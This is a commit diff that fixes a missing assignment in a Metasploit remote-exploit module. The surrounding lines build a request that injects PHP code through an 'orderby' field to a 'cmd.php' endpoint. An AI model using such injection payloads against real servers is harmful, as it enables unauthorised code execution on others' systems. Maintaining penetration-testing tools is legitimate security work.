Fix [SeeRM #8239] NoMethodError undefined method
parent
54af2929f5
commit
73fd14a500
|
@ -114,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
data = "cmd=query_engine&query=none&search=1&orderby=#{php_code}\r\n\r\n"
|
||||
session = get_session
|
||||
|
||||
uri normalize_uri(datastore['URI'])
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
uri << '/' if uri[-1,1] != '/'
|
||||
uri << 'cmd.php'
|
||||
|
||||
|
|
Loading…
Reference in New Issue